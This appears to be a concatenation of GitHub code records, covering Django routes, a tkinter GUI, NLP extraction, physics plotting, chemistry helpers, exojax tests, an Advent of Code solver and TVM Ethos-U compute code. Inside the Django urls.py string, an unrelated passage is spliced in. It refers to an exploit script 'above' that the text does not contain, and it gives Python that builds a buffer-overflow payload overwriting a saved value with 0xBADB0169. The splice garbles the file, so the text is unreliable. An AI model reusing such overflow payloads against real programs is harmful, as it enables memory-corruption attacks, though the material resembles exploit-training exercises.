static\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\njs_info_dict = {\n\t'packages': ('pages',),\n}\n\nurlpatterns = patterns('',\n\t(r'^i18n/', include('django.conf.urls.i18n')),\n\t(r'^jsi18n/$', 'django.views.i18n.javascript_catalog', js_info_dict),\n\t\n\t# Uncomment the next line to enable the admin:\n\turl(r'^admin/', include(admin.site.urls)),\n\t\n\turl(r'^$', 'pages.views.index', name='home'),\n\turl(r'^decks/(?P<deck_id>\\d+)/cards/$', 'pages.views.cards_api'),\n\turl(r'^search/$', 
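The exploit script above fills a 44-byte buffer plus 8 dummy bytes, then overwrites the saved value with `0xBADB0169` packed little-endian. Two notes: `pack` returns `bytes` on Python 3, so concatenating it to `str` as written only runs under Python 2 (on Python 3, open the file with `"wb"` and use byte strings throughout); and the byte order is easy to sanity-check:

```python
from struct import pack, unpack

payload = b"A" * 44                 # fill the vulnerable buffer
payload += b"B" * 8                 # dummy padding
payload += pack("<L", 0xBADB0169)   # little-endian 32-bit value

print(payload[-4:])                        # b'i\x01\xdb\xba' -- LSB first
print(hex(unpack("<L", payload[-4:])[0]))  # 0xbadb0169 round-trips
```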
'pages.views.search'),\n\turl(r'^author/(?P<author>.*)/deck/(?P<deck_slug>.*)/study/$', 'pages.views.study'),\n\turl(r'^author/(?P<author>.*)/deck/(?P<deck_slug>.*)/cards/$', 'pages.views.card_listing'),\n\turl(r'^author/(?P<author>.*)/deck/(?P<deck_slug>.*)/$', 'pages.views.launch'),\n\n\t# Uncomment the admin/doc line below to enable admin documentation:\n\t# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n)\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nurlpatterns += staticfiles_urlpatterns()","repo_name":"codehearts/sleepless","sub_path":"demo/sleepless_demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70665442872","text":"from datetime import timedelta\nfrom platform import system\nimport os\nimport threading\nfrom subprocess import Popen, DEVNULL\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom tkinter import N, E, S, W, END\nfrom tkinter.messagebox import askyesno\nimport sys\n\nfrom sparkmemes.__main__ import render\n\n\nclass Config:\n def __init__(self, root):\n self.root = root\n self.root.title(\"SparkMemes GUI\")\n\n tk.Grid.rowconfigure(self.root, 0, weight=1)\n tk.Grid.columnconfigure(self.root, 1, weight=1)\n\n self.duration = ttk.Scale(\n self.root, command=self.update_time, from_=2, to=250, orient=\"vertical\"\n )\n self.duration.grid(column=0, row=0, rowspan=2, sticky=N + S)\n\n self.prefix = \"r/\"\n self.subreddits = tk.Listbox(self.root, selectmode=\"multiple\")\n self.subreddits.bind(\"<<ListboxSelect>>\", self.update_subreddits)\n self.subreddits.grid(column=1, row=0, sticky=N + E + S + W)\n for x in [\n \"insanepeoplefacebook\",\n \"mildlyinfuriating\",\n \"therewasanattempt\",\n \"woooosh\",\n \"dankmemes\",\n \"me_irl\",\n \"meirl\",\n \"memes\",\n \"wholesomememes\",\n \"MemeEconomy\",\n \"BikiniBottomTwitter\",\n ]:\n self.subreddits.insert(END, self.prefix + x)\n\n self.stats = ttk.Label(self.root, anchor=\"center\")\n self.stats.grid(column=1, row=1, sticky=E + W)\n self.duration.set(\"10\")\n\n self.create = ttk.Button(\n self.root, text=\"Create\", command=self.create_video, state=\"disabled\"\n )\n self.create.grid(column=0, row=2, columnspan=2, sticky=S + E + W)\n\n def create_video(self):\n self.set_state(self.root)\n self.root.update()\n sub_list = [self.subreddits.get(x) for x in self.subreddits.curselection()]\n sub_list = [\n x[x.startswith(self.prefix) and len(self.prefix) :] for x in sub_list\n ]\n self.meme = threading.Thread(\n target=self.render_video, args=(sub_list, self.duration.get())\n )\n self.meme.daemon = True\n self.meme.start()\n\n # Thread this\n def render_video(self, sub_list, duration):\n render(sub_list, duration)\n if askyesno(title=\"Video made\", message=\"Do you want to view it?\"):\n self.open_file(\"video.mp4\")\n self.root.destroy()\n\n def update_subreddits(self, event):\n if len(self.subreddits.curselection()) > 0:\n self.create.config(state=\"enabled\")\n else:\n self.create.config(state=\"disabled\")\n\n def update_time(self, count):\n count = round(float(count))\n if count < 2:\n self.duration.set(\"2\")\n return\n if count > 250:\n self.duration.set(\"250\")\n return\n self.stats.config(\n text=\"{} Memes ({})\".format(count, timedelta(seconds=(count * 10) + 30))\n )\n\n def set_state(self, widget, state=\"disabled\"):\n try:\n widget.configure(state=state)\n except tk.TclError:\n pass\n for child in widget.winfo_children():\n 
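# not every widget accepts a state option (hence the TclError guard above); recurse so all descendants get toggled\n            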
self.set_state(child, state=state)\n\n    def open_file(self, filepath):\n        if system() == \"Darwin\":  # macOS\n            Popen(\n                (\"open\", filepath),\n                start_new_session=True,\n                stdout=DEVNULL,\n                stderr=DEVNULL,\n            )\n        elif system() == \"Windows\":  # Windows\n            os.startfile(filepath)\n        elif system() == \"Linux\":  # Linux\n            Popen(\n                (\"xdg-open\", filepath),\n                start_new_session=True,\n                stdout=DEVNULL,\n                stderr=DEVNULL,\n            )\n\n\nif __name__ == \"__main__\":\n    root = tk.Tk()\n    config = Config(root)\n    root.update()\n    root.minsize(root.winfo_width(), root.winfo_height())\n    root.mainloop()\n    print(\"Goodbye...\")\n","repo_name":"AlexApps99/SparkMemes","sub_path":"sparkmemes/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"}
+{"seq_id":"19830938048","text":"import stanza\nimport codecs\nimport argparse\nimport os\n\n\ndef extract_nouns(en_nlp, text):\n    doc = en_nlp(text)\n    nouns = set()\n    for sent in doc.sentences:\n        candidate = \"\"\n        for word in sent.words:\n            if word.deprel == \"nsubj\":\n                candidate += word.text if len(candidate) == 0 else \" \" + word.text\n            else:\n                if len(candidate) > 0:\n                    nouns.add(candidate)\n                    candidate = \"\"\n        if len(candidate) > 0:  # keep a subject that ends the sentence\n            nouns.add(candidate)\n    return nouns\n\n\ndef convert_to_unicode(text):\n    \"\"\"Converts `text` to Unicode (if it's not already), assuming utf-8 input.\"\"\"\n\n    if isinstance(text, str):\n        return text\n    elif isinstance(text, bytes):\n        return text.decode(\"utf-8\", \"ignore\")\n    else:\n        raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n\n\ndef main(args):\n    en_nlp = stanza.Pipeline('en', use_gpu=True)\n\n    input_files = []\n    for filename in os.listdir(args.input_file):\n        # append the full path; extend() would add it one character at a time\n        input_files.append(os.path.join(args.input_file, filename))\n\n    nouns = set()\n    with codecs.open(args.output_file, \"w\", encoding=\"utf-8\") as out:\n        for input_file in input_files:\n            reader = open(input_file, \"r\")\n\n            while True:\n                # label [\\t] text1 [\\t] text2 [\\n]\n                line = convert_to_unicode(reader.readline())\n                if not line:\n                    break\n                line = line.strip()\n                line = line.split('\\t')\n                text1, text2 = line[1], line[2]\n                noun_set1, noun_set2 = extract_nouns(en_nlp, text1), extract_nouns(en_nlp, text2)\n                nouns = nouns.union(noun_set1.union(noun_set2))\n            reader.close()\n            print(\"File %s stanza extraction done!!!\" % input_file)\n\n        # still inside the with-block, so the output file is open here\n        for kw in nouns:\n            print(kw, file=out)\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='BERT Similarity Project')\n    parser.add_argument('--input_file', type=str, required=True, help='Plain Input file directory.')\n    parser.add_argument('--output_file', type=str, required=True, help='Output file.')\n    args = parser.parse_args()\n    main(args)\n","repo_name":"wuqiyao20160118/BERT_Similarity","sub_path":"keyword_extraction.py","file_name":"keyword_extraction.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"3028428703","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plot\nimport csv\nimport subprocess\nimport sys\nimport numpy as np\n\nif len(sys.argv) != 4:\n    print(\"Usage:\", sys.argv[0],\n          \"<num_particles> <mimas_multiplier> <num_time_steps>\")\n    exit(1)\nsubprocess.run(\n    \"clang -lm -Ofast -march=native sim_ring_gaps.c -o sim_ring_gaps\",\n    shell=True, check=True)\ndata_filename = 'data/mimas_mult=' + sys.argv[2] + '&p=' + sys.argv[1] + \\\n    '&t=' + sys.argv[3] + '.csv'\nsubprocess.run(\n    \"./sim_ring_gaps \" + ' '.join(sys.argv[1:]) + \" > '\" + 
data_filename + \"'\",\n    check=True, shell=True)\ndata = csv.reader(open(data_filename))\nxm, ym = next(data)\nplot.gca().set_aspect('equal')\nplot.title(\"p=\" + sys.argv[1] + \", m=\" + sys.argv[2] +\n           \", t=\" + sys.argv[3], fontsize=8)\nplot.xlabel(\"Distance from Saturn (m)\")\nplot.ylabel(\"Distance from Saturn (m)\")\nplot.plot(float(xm), float(ym), \"ro\", label=\"Mimas\")\nplot.plot(0, 0, \"yo\", markersize=20, label=\"Saturn\")\nx, y = next(data)\nplot.plot(float(x), float(y), \"go\", markersize=1, label=\"Ring Particle\")\n\nparticles_in_division = 0.0\nfor x, y in data:\n    if 1.1758e8 < np.sqrt(float(x)**2 + float(y)**2) < 1.2217e8:\n        particles_in_division += 1\n        plot.plot(float(x), float(y), \"go\", markersize=1)\nplot.plot(1.1758e8, 0, \"bo\", markersize=0.2, label=\"Cassini Division\")\n\nfor i in range(360):\n    ir = i * np.pi / 180\n    plot.plot(1.1758e8 * np.cos(ir), 1.1758e8 * np.sin(ir), \"bo\", markersize=0.2)\n    plot.plot(1.2217e8 * np.cos(ir), 1.2217e8 * np.sin(ir), \"bo\", markersize=0.2)\nplot.figtext(0.05, 0.95, \"Ratio of particles in division to total: \" +\n             str(particles_in_division / int(sys.argv[1])))\n\nplot.legend(loc='upper right')\nplot.savefig('img/mimas_mult=' + sys.argv[2] + '&p=' + sys.argv[1] + '&t=' +\n             sys.argv[3] + '.png')\n","repo_name":"durcor/ring-gap-sim","sub_path":"sim_ring_gaps.py","file_name":"sim_ring_gaps.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"19311800322","text":"def get_rs_chosen_smiles(rs_chosen, r_smiles_dict_1, r_smiles_dict_2):\n    \"\"\"\n    This function returns a list of SMILES strings for every R-group chosen.\n    It requires the R_smile_dictionary for both ligands to function.\n\n    Inputs:\n    :param list rs_chosen: A list of the chosen R-groups which will be used to\n        generate a new mol. ie) ['2R2', '1R1']\n    :param dict r_smiles_dict_1: A dictionary which maps each R-group of\n        Ligand 1 to its SMILES string. ie) {'1R1':\n        '[10006*][1009N]=[1008N+]=[1007N-]'}\n    :param dict r_smiles_dict_2: A dictionary which maps each R-group of\n        Ligand 2 to its SMILES string. ie) {'2R2': '[10006*][2009OH]',\n        '2R1': '[10003*][2007CH2][2008OH]'}\n\n\n    Returns:\n    :returns: list rs_chosen_smiles: A list of all the SMILES strings which are\n        to be added to make the child ligand. Each SMILES is a sublist.\n        ie)[['[10006*][1009N]=[1008N+]=[1007N-]'],['[10006*][2009OH]']]\n    \"\"\"\n\n    rs_chosen_smiles = []\n    for R in rs_chosen:\n        Rs_for_the_R = []\n        lig_number = R[0]\n        if lig_number == str(1):\n            Rs_for_the_R.append(r_smiles_dict_1[R])\n        elif lig_number == str(2):\n            Rs_for_the_R.append(r_smiles_dict_2[R])\n\n        rs_chosen_smiles.append(Rs_for_the_R)\n\n    return rs_chosen_smiles\n\n\ndef get_rs_chosen_from_bs(bs_chosen, b_to_r_master_dict_1, b_to_r_master_dict_2):\n    \"\"\"\n    This function returns a list of R-groups chosen based on the list of\n    chosen B's. It requires the b_to_r_master_dict for both ligands to\n    function.\n\n    Inputs:\n    :param list bs_chosen: A list of the chosen B-groups. ie) ['1B1', '1B2',\n        '2B3']\n    :param dict b_to_r_master_dict_1: a Dictionary to reference B and R-groups\n        from mol_1. keys are names of B-groups; items are R-groups that a B-group\n        represents. ie) {'1B1':['1R1'],'1B2':['1R2','1R3','1R4'],'1B3': ['1R5']}\n    :param dict b_to_r_master_dict_2: a Dictionary to reference B and R-groups\n        from mol_2. keys are names of B-groups; items are R-groups that a B-group\n        represents. 
ie) {'2B1':['2R1'],'2B2':['2R2','2R3','2R4'],'2B3':\n        ['2R5','2R6']}\n\n    Returns:\n    :returns: list rs_chosen: a list containing all the R-groups represented\n        by the chosen B-groups. ie) ['1R1', '1R2', '1R3','1R4', '2R5', '2R6']\n    \"\"\"\n\n    rs_chosen = []\n    for B in bs_chosen:\n        Rs_for_the_B = []\n        lig_number = B[0]\n        if lig_number == str(1):\n            for i in b_to_r_master_dict_1[B]:\n                Rs_for_the_B.append(i)\n\n        elif lig_number == str(2):\n            for i in b_to_r_master_dict_2[B]:\n                Rs_for_the_B.append(i)\n        for i in Rs_for_the_B:\n            rs_chosen.append(i)\n\n    return rs_chosen","repo_name":"YuriiBatkovych/Genetic-algorithms-with-docking","sub_path":"Implementation/src/crossover/groups_dict_r/get_rs_chosen.py","file_name":"get_rs_chosen.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
+{"seq_id":"27946619619","text":"from builtins import print\n\n\nclass Student:\n    def __init__(self):\n        self.name = 'deep'\n        self.sem = 8\n        self.stream = 'IT'\n\n    def update(self):\n        self.stream = 'CE'\n\n    def compare(self, s2):\n        print(\"Compare stream : \",\"Same Stream\" if self.stream == s2.stream else \"Different Stream\")\n\n\ns1 = Student() # <- the constructor runs here and assigns memory to the new object\ns2 = Student()\n# whenever we create a new object it occupies different memory\n'''print(\"Id of s1 : \",id(s1))\nprint(\"Id of s2 : \",id(s2))'''\ns1.name = 'dhaval'\ns1.compare(s2) # self = s1\ns1.update() # s1 is passed implicitly as self\nprint(\"name for s1 : \", s1.name, \"\\nsem for s1 : \", s1.sem, \"\\nstream for s1 : \", s1.stream)\nprint(\"name for s2 : \", s2.name, \"\\nsem for s2 : \", s2.sem, \"\\nstream for s2 : \", s2.stream)\ns2.compare(s1) # self = s2\n\n","repo_name":"deepdalsania/tutorials","sub_path":"core-python/Core_Python/oop/ConstructorAndSelf.py","file_name":"ConstructorAndSelf.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"95"}
+{"seq_id":"7465809745","text":"import numpy as np\nimport jax.numpy as jnp\nfrom jax import jit\nfrom exojax.utils.grids import wavenumber_grid\nfrom exojax.spec.response import ipgauss_sampling\nfrom exojax.spec.response import ipgauss_variable_sampling\nfrom exojax.utils.grids import velocity_grid\n\nfrom exojax.utils.constants import c\n\ndef _ipgauss_sampling_naive(nusd, nus, F0, beta, RV):\n    \"\"\"Apply the Gaussian IP response + sampling to a spectrum F.\n\n    Args:\n        nusd: sampling wavenumber\n        nus: input wavenumber, evenly log-spaced\n        F0: original spectrum (F0)\n        beta: STD of a Gaussian broadening (IP+microturbulence)\n        RV: radial velocity (km/s)\n\n    Return:\n        response-applied spectrum (F)\n    \"\"\"\n    # The following check should be placed as another function.\n    # if(np.min(nusd) < np.min(nus) or np.max(nusd) > np.max(nus)):\n    #     print('WARNING: The wavenumber range of the observational grid [', np.min(nusd), '-', np.max(nusd), ' cm^(-1)] is not fully covered by that of the model grid [', np.min(nus), '-', np.max(nus), ' cm^(-1)]. This can result in the incorrect response-applied spectrum. 
Check the wavenumber grids for the model and observation.', sep='')\n\n    @jit\n    def ipgauss_sampling_jax(nusd, nus, F0, beta, RV):\n        dvmat = jnp.array(c * jnp.log(nusd[None, :] / nus[:, None]))\n        kernel = jnp.exp(-(dvmat + RV)**2 / (2.0 * beta**2))\n        kernel = kernel / jnp.sum(kernel, axis=0)  # axis=N\n        F = kernel.T @ F0\n        return F\n\n    F = ipgauss_sampling_jax(nusd, nus, F0, beta, RV)\n    return F\n\ndef test_ipgauss_sampling(fig=False):\n    nus, wav, resolution = wavenumber_grid(4000.0,\n                                           4010.0,\n                                           1000,\n                                           xsmode=\"premodit\")\n    F0 = np.ones_like(nus)\n    F0[500 - 5:500 + 5] = 0.5\n    RV = 10.0\n    beta = 20.0\n    nusd, wav, resolution_inst = wavenumber_grid(4003.0,\n                                                 4007.0,\n                                                 250,\n                                                 xsmode=\"lpf\")\n    #settings before HMC\n    vsini_max = 100.0\n    vr_array = velocity_grid(resolution, vsini_max)\n\n    F = ipgauss_sampling(nusd, nus, F0, beta, RV, vr_array)\n\n    F_naive = _ipgauss_sampling_naive(nusd, nus, F0, beta, RV)\n    res = np.max(np.abs(1.0 - F_naive/F))\n    print(res)\n    assert res < 1.e-4 # 0.01% relative deviation allowed\n    if fig:\n        import matplotlib.pyplot as plt\n        plt.plot(nusd,F)\n        plt.plot(nusd,F_naive,ls=\"dashed\")\n        plt.show()\n\ndef test_SopInstProfile():\n    from exojax.spec.specop import SopInstProfile\n    \n    nus, wav, resolution = wavenumber_grid(4000.0,\n                                           4010.0,\n                                           1000,\n                                           xsmode=\"premodit\")\n    F0 = np.ones_like(nus)\n    F0[500 - 5:500 + 5] = 0.5\n    RV = 10.0\n    beta = 20.0\n    nusd, wav, resolution_inst = wavenumber_grid(4003.0,\n                                                 4007.0,\n                                                 250,\n                                                 xsmode=\"lpf\")\n    \n    SopInst = SopInstProfile(nus, resolution)\n    \n    F = SopInst.ipgauss(F0, beta)\n    F = SopInst.sampling(F, RV, nusd)\n    F_naive = _ipgauss_sampling_naive(nusd, nus, F0, beta, RV)\n    res = np.max(np.abs(1.0 - F_naive/F))\n    print(res)\n    assert res < 1.e-4 # 0.01% relative deviation allowed\n\n\ndef test_ipgauss_variable_sampling_using_constant_beta_array(fig=False):\n    nus, wav, resolution = wavenumber_grid(4000.0,\n                                           4010.0,\n                                           1000,\n                                           xsmode=\"premodit\")\n    F0 = np.ones_like(nus)\n    F0[500 - 5:500 + 5] = 0.5\n    RV = 10.0\n    beta = 20.0\n    nusd, wav, resolution_inst = wavenumber_grid(4003.0,\n                                                 4007.0,\n                                                 250,\n                                                 xsmode=\"lpf\")\n    #settings before HMC\n    beta = 20.0\n    beta_variable = np.ones_like(nusd)*beta\n\n    F = ipgauss_variable_sampling(nusd, nus, F0, beta_variable, RV)\n\n    F_naive = _ipgauss_sampling_naive(nusd, nus, F0, beta, RV)\n    res = np.max(np.abs(1.0 - F_naive/F))\n    print(res)\n    assert res < 1.e-4 # 0.01% relative deviation allowed\n    if fig:\n        import matplotlib.pyplot as plt\n        plt.plot(nusd,F)\n        plt.plot(nusd,F_naive,ls=\"dashed\")\n        plt.show()\n\n\nif __name__ == \"__main__\":\n    #test_ipgauss_sampling(fig=True)\n    #test_ipgauss_variable_sampling_using_constant_beta_array(fig=True)\n    test_SopInstProfile()\n","repo_name":"HajimeKawahara/exojax","sub_path":"tests/unittests/spec/response/response_test.py","file_name":"response_test.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"95"}
+{"seq_id":"928090232","text":"import util\r\nfrom functools import reduce\r\nimport json\r\nimport math\r\nfrom copy import deepcopy\r\n\r\n\r\nclass Snailfish:\r\n    def __init__(self, left, right, parent=None):\r\n        self.left = left\r\n        self.right = right\r\n        self.parent = parent\r\n        self.final = isinstance(left, int) and isinstance(right, int)\r\n\r\n    @classmethod\r\n    def parse_from_list(cls, input_list):\r\n        if isinstance(input_list, list):\r\n            [left, right] = input_list\r\n            return cls(Snailfish.parse_from_list(left), Snailfish.parse_from_list(right))\r\n        else:\r\n            return input_list\r\n\r\n    def set_parents(self, parent=None):\r\n        
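# record each node's parent so the explode helpers can walk across to neighbouring values\r\n        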
self.parent = parent\r\n if not isinstance(self.left, int):\r\n self.left.set_parents(self)\r\n if not isinstance(self.right, int):\r\n self.right.set_parents(self)\r\n\r\n def __explode_left(self, value, caller):\r\n if caller == self.left:\r\n if self.parent is None:\r\n return\r\n self.parent.__explode_left(value, self)\r\n elif caller == self.right:\r\n if isinstance(self.left, int):\r\n self.left += value\r\n else:\r\n self.left.__explode_left(value, self)\r\n elif caller == self.parent:\r\n if isinstance(self.right, int):\r\n self.right += value\r\n else:\r\n self.right.__explode_left(value, self)\r\n\r\n def __explode_right(self, value, caller):\r\n if caller == self.right:\r\n if self.parent is None:\r\n return\r\n self.parent.__explode_right(value, self)\r\n elif caller == self.left:\r\n if isinstance(self.right, int):\r\n self.right += value\r\n else:\r\n self.right.__explode_right(value, self)\r\n elif caller == self.parent:\r\n if isinstance(self.left, int):\r\n self.left += value\r\n else:\r\n self.left.__explode_right(value, self)\r\n\r\n def __exploded_this(self, caller):\r\n if caller == self.left:\r\n self.left = 0\r\n if isinstance(self.right, int):\r\n self.final = True\r\n elif caller == self.right:\r\n self.right = 0\r\n if isinstance(self.left, int):\r\n self.final = True\r\n else:\r\n print(\"Error\")\r\n\r\n def __reduce_explode(self, depth=0):\r\n if self.final:\r\n if depth >= 4:\r\n self.parent.__explode_right(self.right, self)\r\n self.parent.__explode_left(self.left, self)\r\n self.parent.__exploded_this(self)\r\n return True\r\n return False\r\n else:\r\n if (not isinstance(self.left, int)) and self.left.__reduce_explode(depth + 1):\r\n return True\r\n else:\r\n return (not isinstance(self.right, int)) and self.right.__reduce_explode(depth + 1)\r\n\r\n def __reduce_split(self):\r\n if isinstance(self.left, int):\r\n if self.left >= 10:\r\n self.left = Snailfish(math.floor(self.left/2), math.ceil(self.left/2), self)\r\n self.final = False\r\n return True\r\n else:\r\n if self.left.__reduce_split():\r\n return True\r\n if isinstance(self.right, int):\r\n if self.right >= 10:\r\n self.right = Snailfish(math.floor(self.right/2), math.ceil(self.right/2), self)\r\n self.final = False\r\n return True\r\n else:\r\n return self.right.__reduce_split()\r\n return False\r\n\r\n def reduce(self):\r\n while self.__reduce_explode() or self.__reduce_split():\r\n pass\r\n\r\n def __add__(self, other):\r\n result = Snailfish(self, other)\r\n self.parent = result\r\n other.parent = result\r\n result.reduce()\r\n return result\r\n\r\n def get_magnitude(self):\r\n if type(self.left) == type(self):\r\n left_m = self.left.get_magnitude()\r\n else:\r\n left_m = self.left\r\n if type(self.right) == type(self):\r\n right_m = self.right.get_magnitude()\r\n else:\r\n right_m = self.right\r\n return 3 * left_m + 2 * right_m\r\n\r\n\r\ndef task1():\r\n # Parse and format data\r\n data = util.load_data(\"input/day18.txt\")\r\n data = [Snailfish.parse_from_list(json.loads(line)) for line in data]\r\n for point in data:\r\n point.set_parents()\r\n\r\n # Actual task\r\n total = reduce(lambda a, b: a + b, data)\r\n print(total.get_magnitude())\r\n\r\n\r\ndef task2():\r\n # Parse and format data\r\n data = util.load_data(\"input/day18.txt\")\r\n data = [Snailfish.parse_from_list(json.loads(line)) for line in data]\r\n for point in data:\r\n point.set_parents()\r\n\r\n max_magnitude = 0\r\n for x in data:\r\n for y in data:\r\n if x != y:\r\n max_magnitude = max((deepcopy(x) + 
deepcopy(y)).get_magnitude(), max_magnitude)\r\n\r\n print(max_magnitude)\r\n","repo_name":"Simoris/AdventOfCode21","sub_path":"src/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20946779763","text":"from typing import Callable, Tuple, Optional, List\n\nimport tvm # type: ignore\nfrom tvm import te\nfrom tvm.topi.utils import equal_const_int # type: ignore\n\n\ndef _pad_tensor(\n tensor: te.Tensor, pad_before: List[int], pad_after: Optional[List[int]] = None\n) -> Callable:\n \"\"\"Generate a padded tensor.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to pad.\n pad_before : tuple of int\n The 'before' padding on each axis.\n pad_after : tuple of int\n The 'after' padding on each axis.\n Returns\n -------\n _pad : callable\n The padded tensor.\n\n \"\"\"\n pad_after = pad_after or pad_before\n dims = len(tensor.shape)\n assert len(pad_before) == dims\n assert len(pad_after) == dims\n\n def _pad(*indices):\n not_zero = [] # A list of padding conditions that aren't trivial (zero padding)\n index_tuple = [] # The indices with which to access the padded tensor\n for i in range(dims):\n if equal_const_int(pad_before[i], 0) and equal_const_int(pad_after[i], 0):\n index_tuple.append(indices[i])\n else:\n index_tuple.append(indices[i] - pad_before[i])\n not_zero.append(indices[i] >= pad_before[i])\n not_zero.append(indices[i] < tensor.shape[i] + pad_before[i])\n if not_zero:\n not_zero = tvm.tir.all(*not_zero)\n return tvm.tir.if_then_else(\n not_zero, tensor(*index_tuple), tvm.tir.const(0, tensor.dtype)\n )\n return tensor(*index_tuple)\n\n return _pad\n\n\ndef read_compute(\n tensor: te.Tensor, zero_point: int, scale: float, layout: Optional[str] = None\n) -> te.Tensor:\n \"\"\"A tensor expression which represents a read.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to read.\n zero_point : int\n The zero point of the tensor.\n scale : float\n The scale of the tensor.\n layout : Optional[str]\n The layout of the tensor, either NHWC or NHCWB16.\n\n Returns\n -------\n te.Tensor\n The tensor having been read.\n\n \"\"\"\n read_attrs = {\n \"op\": \"ethosu_read\",\n \"zero_point\": zero_point,\n \"scale\": scale,\n }\n\n if layout:\n assert layout in {\"NHWC\", \"NHCWB16\"}\n read_attrs[\"layout\"] = layout\n\n return te.compute(tensor.shape, lambda *i: tensor(*i), name=\"ethosu_read\", attrs=read_attrs)\n\n\ndef write_compute(\n tensor: te.Tensor,\n zero_point: int,\n scale: float,\n layout: Optional[str] = None,\n attrs: dict = None,\n) -> te.Tensor:\n \"\"\"A tensor expression which represents a write.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to write.\n zero_point : int\n The zero point of the tensor.\n scale : float\n The scale of the tensor.\n layout : Optional[str]\n The layout of the tensor, either NHWC or NHCWB16.\n attrs : dict, optional\n Additional attributes to add to the compute op.\n\n Returns\n -------\n te.Tensor\n The tensor having been written.\n\n \"\"\"\n\n if not attrs:\n attrs = {}\n\n write_attrs = {\n \"op\": \"ethosu_write\",\n \"zero_point\": zero_point,\n \"scale\": scale,\n }\n\n if layout:\n assert layout in {\"NHWC\", \"NHCWB16\"}\n write_attrs[\"layout\"] = layout\n\n write_attrs = {**write_attrs, **attrs}\n return te.compute(\n tensor.shape,\n lambda *i: tensor(*i),\n name=\"ethosu_write\",\n attrs=write_attrs,\n )\n\n\ndef convert_to_nhwc_compute(tensor: te.Tensor, layout: str, 
channels: int) -> te.Tensor:\n \"\"\"Converts a tensor into NHWC layout if it's in NHWCB16 layout.\n\n When the current layout is NHCWB16, a reduce sum operation is inserted\n to ensure that the whole of the input tensor has a data dependency on\n the copy operation. Without this, TVM removes compute that is deemed to\n be unnecessary, which causes strides for the NPU to be calculated\n incorrectly.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to convert.\n layout : str\n The layout of the tensor, either NHWC or NHCWB16.\n channels : int\n The number of valid channels for the tensor.\n\n Returns\n -------\n te.Tensor\n The converted tensor in NHWC layout.\n\n \"\"\"\n assert layout in {\"NHWC\", \"NHCWB16\"}\n convert_to_nhwc_attrs = {\n \"op\": \"ethosu_convert_to_nhwc\",\n \"layout\": layout,\n }\n if layout == \"NHCWB16\":\n rc = te.reduce_axis((0, 16), name=\"rc\")\n return te.compute(\n (tensor.shape[0], tensor.shape[1], tensor.shape[3], channels),\n lambda nn, hh, ww, cc: te.sum(\n tensor(nn, hh, te.indexdiv(cc, 16), ww, te.indexmod(rc, 16)), axis=rc\n ),\n name=\"ethosu_convert_to_nhwc\",\n attrs=convert_to_nhwc_attrs,\n )\n\n return te.compute(\n tensor.shape,\n lambda *i: tensor(*i),\n name=\"ethosu_convert_to_nhwc\",\n attrs=convert_to_nhwc_attrs,\n )\n\n\ndef convert_to_nhcwb16_compute(tensor: te.Tensor, layout: str, channels: int) -> te.Tensor:\n \"\"\"Converts a tensor into NHCWB16 layout if it's in NHWC layout.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to convert.\n layout : str\n The layout of the tensor, either NHWC or NHCWB16.\n channels : int\n The number of valid channels for the tensor.\n\n Returns\n -------\n te.Tensor\n The converted tensor in NHCWB16 layout.\n\n \"\"\"\n assert layout in {\"NHWC\", \"NHCWB16\"}\n convert_to_nhcwb16_attrs = {\n \"op\": \"ethosu_convert_to_nhcwb16\",\n \"layout\": layout,\n }\n if layout == \"NHCWB16\":\n out_channel_bricks = te.indexdiv(channels - 1, 16) + 1\n output_shape = (1, tensor.shape[1], out_channel_bricks, tensor.shape[2], 16)\n return te.compute(\n output_shape,\n lambda nn, hh, cc, ww, cb: tvm.tir.if_then_else(\n cc * 16 + cb < channels,\n tensor(nn, hh, ww, cc * 16 + cb),\n tvm.tir.IntImm(tensor.dtype, 0),\n ),\n name=\"ethosu_convert_to_nhcwb16\",\n attrs=convert_to_nhcwb16_attrs,\n )\n\n return te.compute(\n tensor.shape,\n lambda *i: tensor(*i),\n name=\"ethosu_convert_to_nhcwb16\",\n attrs=convert_to_nhcwb16_attrs,\n )\n\n\ndef pad_compute(tensor: te.Tensor, padding: tuple) -> te.Tensor:\n \"\"\"Pad an NHWC tensor in the height and width axes.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to pad.\n padding : tuple\n The 4 dimensional padding as (pad_top, pad_left, pad_bottom, pad_right).\n\n Returns\n -------\n te.Tensor\n The padded tensor.\n\n \"\"\"\n pad_top, pad_left, pad_down, pad_right = padding\n pad_before = [0, int(pad_top), int(pad_left), 0]\n pad_after = [0, int(pad_down), int(pad_right), 0]\n pad_attrs = {\n \"op\": \"ethosu_pad\",\n }\n shape = tensor.shape\n return te.compute(\n (shape[0], shape[1] + pad_top + pad_down, 